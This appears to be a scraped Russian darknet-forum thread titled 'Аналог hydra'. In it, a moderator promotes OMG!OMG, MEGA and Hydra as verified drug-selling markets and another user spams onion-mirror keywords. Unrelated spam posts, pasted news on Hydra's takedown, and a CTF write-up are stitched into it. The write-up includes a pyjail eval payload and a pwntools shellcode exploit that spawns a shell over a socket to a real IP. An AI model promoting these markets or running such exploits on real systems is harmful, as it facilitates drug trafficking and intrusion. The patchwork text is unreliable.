Аналог hydra

Ujamopy

Модератор
Подтвержденный
Сообщения
521
Реакции
26
Уважаемые пользователи RuTOR , Все сайты из нашего списка проверены и находятся онлайн, их нет в скам листах. Остерегайтесь фишинг сайтов и помните об уголовной ответственности за незаконные сделки. Подборка официальных сайтов по продаже веществ от форума Rutor носит исключительно информативный характер.

1. OMG!OMG - MOST ADVANCED DARKMARKET

Эта площадка существует довольно давно и в этот период она медленно развивалась в тени гидры. В настоящее время это ведущий сайт по продаже веществ в даркнете.
 

 

2. MEGA - DARKNET MARKET

Благодаря хорошей подготовке и листингу на зарубежных сайтах площадка смогла составить конкуренцию в стабильности и доступности, чего не смогли ее конкуренты, но все же она уступает по полпулярности площадке OMG!OMG!

 

3. HYDRA - Возрождение легенды.

Идут работы по восстановлению всеми любимой гидры, но все не так просто как казалось ранее, совсем скоро она будет доступна, а сейчас нам остается только ждать релиза от команды HYDRA.

 

________________________
RUTOR — Главная торговая и информационная площадка в сети Tor.



Lodulot

Местный
Сообщения
50
Реакции
24
Аналог hydra
Ссылка на гидру 2021 россии рабочаяTalibukКак гидры зайти на omg через тор онион? Зеркала Гидры omgruz 4af onion. ОМГ официальный сайт, omg onion, не работает омг, как войти на омг, омг вход, omgruzxpnew4af. Правильные ссылки на Гидру : на вход, зеркало и магазин. Правильная ссылка на omg onion…
 

Gewat

Пассажир
Сообщения
81
Реакции
24
62K 1 мин. Мещанский районный суд Москвы 11 апреля заключил под стражу некоего Дмитрия Павлова. Его арестовали по делу о производстве, сбыте и распространении наркотиков (ч. 5 ст. 228.1 УК РФ), следует из карточки на сайте суда. Агентство «Москва» уточняет, что у арестованного мужчины отчество Олегович. Его полного тезку власти США называют одним из основателей онлайн-площадки по продаже наркотиков omg.Минюст США 5 апреля объявил об уголовных обвинениях против 30-летнего Дмитрия Олеговича Павлова, жителя России, в связи с делом omg. Его обвинили в сговоре с целью распространения наркотиков и отмывании денег. В тот же день полиция Германии сообщила, что «обезвредила серверную инфраструктуру» omg. Были конфискованы биткойны на сумму, эквивалентную примерно €23 млн. Сам Павлов 6 апреля сказал BBC, что американские власти на него не выходили, и про обвинения он узнал от журналиста.omg запустили в 2015 году. Он считается крупнейшим российским даркнет-рынком, который начинал с торговли наркотиками. На середину 2019 года на ресурсе было зарегистрировано 2,5 млн аккаунтов. В основном транзакции на omg осуществлялись в криптовалюте. Эксперты считают, что omg устойчива «из-за сотрудничества со спецслужбами».Подробнее читайте в публикации «Ъ» «"ОМГ" отрастила головы».
Аналог hydra
 
A

Abibiwat

Пассажир
Сообщения
64
Реакции
0
K dispozici je ubytovací zařízení hotelového typu s kapacitou 51 lůžek. K dispozici jsou dvoulůžkové, třílůžkové a čtyřlůžkové pokoje. Všechny pokoje mají kompletní sociální zařízení. Ubytování lze objednat telefonicky nebo e-mailem. Recepce se nachází v prostorách restaurace.Kromě mimořádně hezké lokality je kemp vyhledáván i pro jeho situování v blízkosti hlavního města a dopravních spojů s centrem města. K dispozici jsou veškeré služby (přípojky pro karavany, pračky, dřezy, separátní výlevka, internet, restaurace, venkovní letní kruhový bar, klubovna, dětský koutek, dětský bazén, přístaviště lodí, vstup do jezera).V přilehlé části ubytovacího zařízení se nachází restaurace s kapacitou 30 míst k sezení s vlastní zastřešenou terasou a výhledem na přehradní jezero. Přímo u Vltavy stojí kruhový bar, který nabízí během slunných letních dní skvělé občerstvení.
 

Bixumyz

Пассажир
Сообщения
43
Реакции
2
Adtail – Marketing DigitalAcreditamos no digital como meio de transformação da sua empresa, trabalhando com inteligência e técnica em cada canal online para atingir todas as metas. Nosso time é formado por profissionais especializados e estratégicos, que planejam e executam ações em canais de e-mail, mídia paga e redes sociais.Somos movidos pela performance e entramos em cada projeto para fazer a diferença, com criatividade, expertise e muita dedicação, sempre baseados em dados. Atendemos marcas de diversos segmentos e fases dentro do digital, desde o gerenciamento de budgets em mídias específicas até o desenvolvimento de estratégias multicanais.
Estamos sempre abraçando mudanças e inovações de um mercado que se transforma em grande velocidade.Em sintonia com a evolução das tecnologias, tendências e cenários, nosso time e nossas entregas se atualizam constantemente. Contamos com as principais plataformas e veículos de marketing digital para o aperfeiçoamento do conhecimento. Nossos profissionais são certificados e com ampla visão de negócio, conectados com as inovações técnicas e estratégias, participam de eventos, treinamentos, palestras, webinars e outros.Nosso foco é o desenvolvimento da sua marca e realizamos isso através da aplicação de metodologias próprias de otimização de resultados, sempre alinhadas com boas práticas em mídia, business intelligence, e-mail marketing, design gráfico, SEO e redes sociais.Isso é Great Place to Work. Isso é Adtail.Nosso maior ativo são as pessoas! Uma equipe acima da média, que entrega o seu melhor diariamente e está sempre buscando mais. Somos um time, com conhecimentos e habilidades diferentes aplicados de forma complementar para construir resultados de excelência.Alguns de nossos clientes:Desenvolvemos estratégias de performance para marcas como:Ferramentas:Contamos com algumas das principais ferramentas do setor de marketing digital.Artigos:Confira os últimos textos do nosso time de expertsO novo Google Analytics 4 permite uma visão estratégica inovadora e mais completa dos usuários. Com novas tecnologias, mais recursos e a descontinuação do Universal Analytics, a hora de entrar […]Read MoreO dia das mães é um momento para celebrar e retribuir o amor materno, e justamente por isso, é a data mais importante do comércio brasileiro no 1º semestre. O […]Read MoreA Curva ABC é um conceito relevante para vender sempre e ter um estoque de produtos movimentado. Continue a leitura e aprenda mais! O que é Princípio de Pareto? O […]Read More1234Next ›Last »VEJA TODOS OS ARTIGOSCases:Adtail e Daniela Tombini: 3 anos de gestão e 3X mais resultados.CONFIRA O CASECasesShopping dos Cosméticos e Adtail, a multiplicação dos resultados.CONFIRA O CASECasesAnacapri: +29% de receita/mês com recurso Adaptive Bidding da Criteo.CONFIRA O CASEEstamos prontos para desenvolver e operar as estratégias digitais que sua marca precisa!ENTRE EM CONTATOESCRITÓRIOS:Porto Alegre:
Rua Dona Laura, 320 12º andar
Rio Branco – Porto Alegre – RS
CEP: 90430-090
Telefone: +55 (51) 4009.5510São Paulo:
Av. Nações Unidas, 11.857 – 8º Andar
Brooklin – São Paulo – SP
CEP: 04578-908
Telefone: +55 11 5093 2403NAVEGUE:ASSINE A NEWS:SERVIÇOS:Copyright © 2020. Adtail Marketing Digital – Todos os direitos reservados.
 

Xihyfaxo

Пассажир
Сообщения
28
Реакции
14
This is my write-up for recent hack you spb CTF - a CTF for newbies. I guess I'm a bit older here ahaha.Reverse 100:#include <stdio.h>#include <string.h>int main() { char buf[64]; gets(buf); int l = strlen(buf); if (l * l != 144) return 1; unsigned int a = buf[0] | (buf[4] << 8) | (buf[8] << 16); unsigned int b = buf[1] | (buf[5] << 8) | (buf[9] << 16); unsigned int c = buf[2] | (buf[6] << 8) | (buf[10] << 16); unsigned int d = buf[3] | (buf[7] << 8) | (buf[11] << 16); if (!(((a % 3571) == 2963) && (((a % 2843) == 215)) && (((a % 30243) == 13059)))) return 2; if (!(((b % 80735) == 51964) && (((b % 8681) == 2552)) && (((b % 40624) == 30931)))) return 3; if (!(((c % 99892) == 92228) && (((c % 45629) == 1080)) && (((c % 24497) == 12651)))) return 4; if (!(((d % 54750) == 26981) && (((d % 99627) == 79040)) && (((d % 84339) == 77510)))) return 5; printf("Congratulations %s is flag\n",buf); return 0;}First of all, I think about use something like z3, or any SAT that could give me the valid number. But z3 took a lot of time, so I decided to look deeper... Yes, you could finger out there is a pattern (x % number1 == number2), so you could apply Chinese remainder theorem to get a, b, c.Reverse 200:
This is a .pyc file, which is a file contain python byte-code. As usual, for byte-code relative problems, I search for some python byte-code decompiler and found pycdc.
After decompil, you should get something like this# Source Generated with Decompyle++# File: rev200_bot_7b541a1.pyc (Python 2.7)import configimport tracebackimport refrom base64 import *from twx.botapi import TelegramBot, ReplyKeyboardMarkup, ReplyKeyboardHidesec_state = { }def process_message(bot, u):Warning: Stack history is not empty! if u.message.sender and u.message.text and u.message.chat: chat_id = u.message.chat.id user = u.message.sender.username reply_hide = ReplyKeyboardHide.create() print 'user:%s mes:%s' % (user, u.message.text) if user not in sec_state: sec_state[user] = { 'mode': 15, 'stage': 7 } cmd1 = u.message.text.encode('utf-8') a = re.findall('(\\/\\w+)\\s*(.*)', cmd1) if a: cmd = a[0][0] data = a[0][1] if cmd == '/help': bot.send_message(chat_id, 'Usage: \n\n/help - show this help\n/enter - enter secret mode\n', reply_markup = reply_hide) if cmd == '/enter': keyboard = [ [ '-7-', '-8-', '-9-'], [ '-4-', '-5-', '-6-'], [ '-1-', '-2-', '-3-'], [ '-0-']] reply_markup = ReplyKeyboardMarkup.create(keyboard) bot.send_message(chat_id, 'please enter access code', reply_markup = reply_markup).wait() if sec_state[user]['mode'] == 0 and cmd == '/7779317': ddd = b64decode(data) bot.send_message(chat_id, eval(ddd)) a = re.findall('-(\\d+)-', cmd1) if a: num = a[0] if int(num) == sec_state[user]['stage']: sec_state[user]['stage'] = (sec_state[user]['stage'] * sec_state[user]['stage'] ^ 1337) % 10 sec_state[user]['mode'] = sec_state[user]['mode'] - 1 if sec_state[user]['mode'] < 0: sec_state[user]['mode'] = 0 if sec_state[user]['mode'] == 0: bot.send_message(chat_id, 'Secret mode enabled!', reply_markup = reply_hide).wait() else: print 'NO', num, sec_state[user]['stage'] bot.send_message(chat_id, 'Invalid password!', reply_markup = reply_hide).wait() sec_state[user]['mode'] = 15 bot = TelegramBot(config.token)bot.update_bot_info().wait()print bot.usernamelast_update_id = 0while True: updates = bot.get_updates(offset = last_update_id).wait() try: for update in updates: if int(update.update_id) > int(last_update_id): last_update_id = update.update_id process_message(bot, update) continue continue except Exception: ex = None print traceback.format_exc() continue So this is a kind of chat-bot server based on Telegram.
There is eval function inside,  bot.send_message(chat_id, eval(ddd)), so I need to control ddd which is a base64 decoded string from data we sent. Before that, I need to enter Secret mode by enter correct access code (0-9).
First, set sec_state[user]['mode'] = 0; First time, stage init to 7, that changed everytime you press the correct key; But if I dont remember the stage, I still could find out by bruteforce from 0 to 9, if I didn't recv incorrect message that's mean I pressed the correct one; then by use the following script, I'm able to access secret area;#coding: utf-8sec_state = { }user = "A"sec_state[user] = {'mode': 15,'stage': 7 } # bruteforce numbersec_state[user]['mode'] = 15r = []while 1: num = sec_state[user]['stage'] r.append(num) print "-%d-" % num sec_state[user]['stage'] = (sec_state[user]['stage'] * sec_state[user]['stage'] ^ 1337) % 10 sec_state[user]['mode'] = sec_state[user]['mode'] - 1 if sec_state[user]['mode'] < 0: sec_state[user]['mode'] = 0 if sec_state[user]['mode'] == 0: breakprint sec_state[user]['mode']Next, this is a pyjail, so I can't execute normal python command...
So, final payload is `str(().__class__.__base__.__subclasses__()[40]("flag","r").read())`or `/7779317 c3RyKCgpLl9fY2xhc3NfXy5fX2Jhc2VfXy5fX3N1YmNsYXNzZXNfXygpWzQwXSgiZmxhZyIsInIiKS5yZWFkKCkp`Reverse 300:
Let's get some fun.let reverse this (or not?), look at handler (the main function)ssize_t __cdecl handler(int fd){ ssize_t result; // [email protected] unsigned int buf; // [sp+20h] [bp-18h]@1 int v3; // [sp+24h] [bp-14h]@1 char *v4; // [sp+28h] [bp-10h]@4 int v5; // [sp+2Ch] [bp-Ch]@4 buf = 0; setuid(0x3E8u); seteuid(0x3E8u); setgid(0x3E8u); setegid(0x3E8u); result = recv(fd, &buf, 4u, 0); v3 = result; if ( result == 4 ) { result = buf; if ( buf <= 0xC8 ) { v4 = (char *)mmap(0, buf, 7, 33, -1, 0); v3 = recv(fd, v4, buf, 0); result = crc32(0, v4, buf); v5 = result; if ( result == 0xCAFEBABE ) { result = filter(v4, buf) ^ 1; if ( !(_BYTE)result ) result = ((int (*)(void))v4)(); } } } return result;}So the basic idea is make result == 0xCAFEBABE, so the program will execute v4 as shellcode (function pointer), but you also need to bypass the filter function - check if contain any of 0x0, 0x1, 0x2f, 0x68, 0x73 ( so I can't use sh in plaintext)then exit; So, I did the following step:1. Find a program that can make crc32 of my shellcode equal 0xCAFEBABE
2. Make a great shellcode and Bypass filter.
By search google for everything, the answer for problem 1 is force-crc32.
Currently I'm also trying to learn some binary exploit method, write a shellcode isn't hard (hint xor), but if there is any framework that's good enough as pwntools , you shoud try at least once.
Basicaly, I import pwns and let pwntools do the rest;from pwn import *import socket, struct, telnetlibdef getCRC(data): import subprocess with open('/tmp/12', 'wb') as f: f.write(data + "123456") subprocess.check_output(['python', 'forcecrc32.py', '/tmp/12', str(len(data)+1) , 'CAFEBABE']) with open('/tmp/12', 'rb') as f: data = f.read() return datadef crc32(data):# recheck import zlib return (zlib.crc32(data)) & 0xffffffffd = ""d += asm(pwnlib.shellcraft.i386.linux.dup2(4,0))d += asm(pwnlib.shellcraft.i386.linux.dup2(4,1))# i need dup2 because the program use itself as serverd += asm(pwnlib.shellcraft.i386.linux.sh())fsc = pwnlib.encoders.encoder.encode(d, '\n\x01\0\x2f\x73\x68')print len(fsc)fsc = getCRC(fsc) # it didn't contain any blocked char, so i dont need to re-generate again.print hex(crc32(fsc))#yes, i love my custom socket lib 🙁s = socket.create_connection(("78.46.101.237", 3177))s.send(p32(len(fsc)))s.send(fsc)s.send("\n")s.send("cat flag*\n") print s.recv(1024)To be continued....Related
 

Ocofy

Пассажир
Сообщения
41
Реакции
22
США ввели санкции в отношении самого известного в мире даркнет-ресурса omg - крупнейшей в России площадки по продаже наркотиков. В сообщении американского минфина указывается, что на этой площадке за криптовалюту можно было приобрести и другие незаконные услуги, такие как кибервымогательство.Все имущество физических и юридических лиц, имеющих отношение к "Гидре", которое находится в Соединенных Штатах или во владении или под контролем физических или юридических лиц США, будет заблокировано.Управление по контролю за иностранными активами (OFAC) министерства финансов США ввело санкции в отношении крупнейшего и самого известного в мире рынка даркнета omg Market (omg) в рамках скоординированных международных усилий по предотвращению распространения вредоносных киберпреступных сервисов.Операция против "Гидры" была совместной инициативой министерства юстиции США, Федерального бюро расследований, Управления по борьбе с наркотиками, налогового управления США по уголовным расследованиям и службы расследований национальной безопасности. Эта акция была проведена совместно с федеральной криминальной полицией Германии, которая во вторник отключила серверы omg в Германии и конфисковала биткоины на сумму 25 млн долларов."Глобальная угроза киберпреступности и программ-вымогателей, которые исходят из России, а также способность криминальных лидеров безнаказанно действовать там, глубоко беспокоят Соединенные Штаты", - заявила министр финансов Джанет Йеллен."Наши действия сегодня посылают преступникам сигнал о том, что они не смогут спрятаться в даркнете, в России или где-либо еще в мире. В координации с союзниками и партнерами, такими как Германия и Эстония, мы продолжим разрушать эти сети", - сказала она.Ранее полиция Германии сообщила об изъятии серверов, которые обеспечивали работу даркнет-ресурса omg. Немецкие власти сообщают, что изъятие серверов привело к фактической ликвидации площадки.Из сообщения на сайте Федерального ведомства уголовной полиции Германии (BKA) следует, что во вторник полиция, прокуратура Франкфурта-на-Майне и центральное управление по борьбе с киберпреступностью (ZIT) провели операцию, в результате которой были изъяты серверы "Гидры" и биткоины в эквиваленте 23 млн евро. Эта криптовалюта использовалась как основное средство расчетов на площадке.Наркотики на "Гидре" продавались посредством так называемых закладок: после оплаты покупки клиент получал географические координаты, по которым находился тайник с искомым.На площадке было зарегистрировано около 17 млн клиентских аккаунтов и более 19 тыс. продавцов. Сейчас сайт и его зеркала недоступны, убедилась Русская служба Би-би-си.Американские и германские ведомства называют "Гидру" крупнейшим нелегальным даркнет-рынком в мире, хотя основная его аудитория сосредоточена в России. Только в 2020 году его продажи составили не менее 1,23 млрд евро, говорится в сообщении BKA. Русскоязычный маркетплейс, на котором можно было купить наркотики и некоторые виды поддельных документов, работал с 2015 года.Германское центральное управление по борьбе с киберпреступностью начало предварительное расследование в отношении операторов и администраторов платформы. Их подозревают в покупке или предоставлении возможности для нелегальной торговли наркотиками, а также в отмывании денег.В среде постоянных пользователей площадки, а также среди экспертов было распространено мнение, что "ОМГ" долгое время оставалась на плаву благодаря покровительству высокопоставленных российских силовиков.Хотя основной профиль "Гидры" - торговля наркотиками, известен как минимум один случай, когда через эту площадку фактически было заказано убийство человека - подмосковного следователя Евгении Шишкиной. Об этой истории подробно писала Русская служба Би-би-си.Незаконные распространение, приобретение, хранение, перевозка, изготовление, переработка наркотиков, а также их употребление в России преследуются по закону. Русская служба Би-би-си не поддерживает и не пропагандирует никакие из перечисленных деяний.Чтобы продолжать получать новости Би-би-си, подпишитесь на наши каналы:
 

Похожие темы

  • Isyfituj
  • 08 Авг 2021, 20:11
  • Eheloq
  • 09 Авг 2021, 05:33
  • Ewase
  • 08 Авг 2021, 14:43
  • Uwimoj
  • 09 Авг 2021, 18:49
  • Opahyh
  • 08 Авг 2021, 22:09
Сверху Снизу